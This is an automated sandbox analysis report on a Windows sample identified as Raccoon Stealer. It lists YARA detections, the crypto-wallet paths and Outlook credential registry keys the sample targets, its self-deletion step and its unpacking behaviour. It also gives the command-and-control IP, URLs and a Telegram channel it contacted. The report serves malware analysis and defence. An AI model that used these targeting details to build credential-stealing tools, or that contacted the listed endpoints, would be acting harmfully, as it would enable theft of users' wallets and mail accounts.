Source: C:\Users\user\Desktop\31cGYywxgy.exe Code function: 0_2_0042A2F9 GetVersionExW,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,StrStrIW,lstrlenW,lstrlenW,FreeLibrary, 0_2_0042A2F9
Source: C:\Users\user\Desktop\31cGYywxgy.exe Code function: 0_2_0042C383 __EH_prolog,CoInitialize,GetUserDefaultLCID,GetLocaleInfoA,Sleep,Sleep,GetUserNameA,Sleep,_strlen,_strlen,CreateThread,CreateThread,CreateThread,CreateThread,StrToIntA,CreateThread,CreateThread,WaitForSingleObject,CreateThread,CreateThread,CreateThread,CreateThread,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,CreateThread,CreateThread,GetModuleHandleA,FreeLibrary,WaitForSingleObject,lstrlenA,lstrlenA,GetEnvironmentVariableA,ShellExecuteA,ShellExecuteA,CoUninitialize, 0_2_0042C383

Stealing of Sensitive Information:

barindex
Yara detected Raccoon Stealer
Source: Yara match File source: 0.2.31cGYywxgy.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.31cGYywxgy.exe.2220000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.31cGYywxgy.exe.2120e50.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.31cGYywxgy.exe.2220000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.31cGYywxgy.exe.2120e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.31cGYywxgy.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.257211865.0000000002220000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.282454454.0000000002120000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 31cGYywxgy.exe PID: 3104, type: MEMORYSTR
Found many strings related to Crypto-Wallets (likely being stolen)
Source: 31cGYywxgy.exe, 00000000.00000002.282340481.0000000000738000.00000004.00000001.sdmp String found in binary or memory: Electrum-LTC;26;Electrum-LTC\wallets;*;|
Source: 31cGYywxgy.exe, 00000000.00000002.282340481.0000000000738000.00000004.00000001.sdmp String found in binary or memory: ElectronCash;26;ElectronCash\wallets;*;|
Source: 31cGYywxgy.exe, 00000000.00000002.282340481.0000000000738000.00000004.00000001.sdmp String found in binary or memory: Jaxx;26;Jaxx;*;*cache*
Source: 31cGYywxgy.exe, 00000000.00000002.282340481.0000000000738000.00000004.00000001.sdmp String found in binary or memory: ;26;exodus
Source: 31cGYywxgy.exe, 00000000.00000002.282340481.0000000000738000.00000004.00000001.sdmp String found in binary or memory: C:\Users\user\AppData\Roaming\Ethereum
Tries to steal Mail credentials (via file access)
Source: C:\Users\user\Desktop\31cGYywxgy.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts Jump to behavior
Source: C:\Users\user\Desktop\31cGYywxgy.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings Jump to behavior
Source: C:\Users\user\Desktop\31cGYywxgy.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook Jump to behavior

Remote Access Functionality:

barindex
Yara detected Raccoon Stealer
Source: Yara match File source: 0.2.31cGYywxgy.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.31cGYywxgy.exe.2220000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.31cGYywxgy.exe.2120e50.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.31cGYywxgy.exe.2220000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.31cGYywxgy.exe.2120e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.31cGYywxgy.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.257211865.0000000002220000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.282454454.0000000002120000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 31cGYywxgy.exe PID: 3104, type: MEMORYSTR
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 491712 Sample: 31cGYywxgy Startdate: 27/09/2021 Architecture: WINDOWS Score: 100 30 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->30 32 Found malware configuration 2->32 34 Multi AV Scanner detection for submitted file 2->34 36 4 other signatures 2->36 7 31cGYywxgy.exe 76 2->7         started        process3 dnsIp4 26 194.180.174.100, 49745, 49755, 80 MIVOCLOUDMD unknown 7->26 28 t.me 149.154.167.99, 443, 49742 TELEGRAMRU United Kingdom 7->28 18 C:\Users\user\AppData\...\vcruntime140.dll, PE32 7->18 dropped 20 C:\Users\user\AppData\...\ucrtbase.dll, PE32 7->20 dropped 22 C:\Users\user\AppData\...\softokn3.dll, PE32 7->22 dropped 24 55 other files (none is malicious) 7->24 dropped 38 Detected unpacking (changes PE section rights) 7->38 40 Detected unpacking (overwrites its own PE header) 7->40 42 Tries to steal Mail credentials (via file access) 7->42 44 Self deletion via cmd delete 7->44 12 cmd.exe 1 7->12         started        file5 signatures6 process7 process8 14 conhost.exe 12->14         started        16 timeout.exe 1 12->16         started       
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
194.180.174.100
 unknown unknown
39798 MIVOCLOUDMD true
149.154.167.99
 t.me United Kingdom
62041 TELEGRAMRU false

Contacted Domains

Name IP Active
t.me 149.154.167.99 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://194.180.174.100//l/f/G5GYJXwB3dP17Spz8m-L/70e760d32c85dd68bb76b7cf4f9d65a400d87d16 true
  • Avira URL Cloud: safe
 unknown
http://194.180.174.100/ true
  • Avira URL Cloud: safe
 unknown
https://t.me/agrybirdsgamerept false
    		high
    http://194.180.174.100//l/f/G5GYJXwB3dP17Spz8m-L/d9a87544924531ef155dbccfe1a04e27038ca861 true
    • Avira URL Cloud: safe
    		 unknown